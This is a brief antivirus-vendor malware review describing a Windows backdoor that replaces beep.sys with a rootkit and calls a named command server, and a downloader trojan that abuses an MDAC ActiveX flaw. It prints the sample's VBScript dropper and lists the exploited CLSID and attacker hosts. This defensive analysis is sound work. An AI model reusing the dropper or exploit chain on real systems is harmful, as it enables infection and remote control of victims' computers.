Weekly Review – Unpatched systems are getting it ...

Backdoor.Agent.AADK

Upon execution overwrites a non-critical Windows driver "beep.sys" with a rootkit detected by BitDefender as Trojan.Rootkit.GGR and enables access to SSDT (System Service Descriptor Table).

A second component is dropped in %windir%\system32 and is loaded as a service at every system startup. The service is called "MS Media Control Center" and has the description "Provides support for T*m*t*D.dll", where * are random ASCII characters. This *.DLL is detected as Backdoor.PCClient.TEO.

The backdoor tries to connect to awen667788.3322.org on TPCP port 1122 sending synchronization packets and waiting for remote commands and a new malware file which is saved as C:\1.exe.

Trojan.Downloader.JS.Psyme.SR

This Trojan uses obfuscated VBScript and JavaScript code to download and execute other malware on the users' computer. It is not executed from a web page, it runs on the infected computer.

It is part of a drive-by exploit chain (like Trojan.Exploit.SSX - http://www.bitdefender.com/VIRUS-1000396-en--Trojan.Exploit.SSX.html) which uses known vulnerabilities to infiltrate unpatched systems. This one tries to exploit a vulnerability in Microsoft Data Access Component (MDAC) ActiveX Object through it's CLSID BD96C556-65A3-11D0-983A-00C04FC29E36 in order to download a file from hxxp://?.weixk.com/[removed].css which is detected by BitDefender as Rootkit.Agent.AIWN. The file is save under %temp% with the name "GameeeEeee.pif".

Afterwards it creates another VBScript file with the content:

'I LOVE gameee TEAM'I LOVE gameee TEAM
Set Love_gameee = CreateObject("Wscript.Shell")'I LOVE gameee TEAM
'I LOVE gomeee TEAM'i LOVE gomeee TEAM
Love_gameee.run ("%Temp%\GameeeEeee.pif")
'I LOVE gameee TEAM'I LOVE gameee TEAM

This file will run the downloaded rootkit as a shell object.

Information in this article is available courtesy of BitDefender virus researchers: Ovidiu Visoiu, Daniel Chipiristeanu.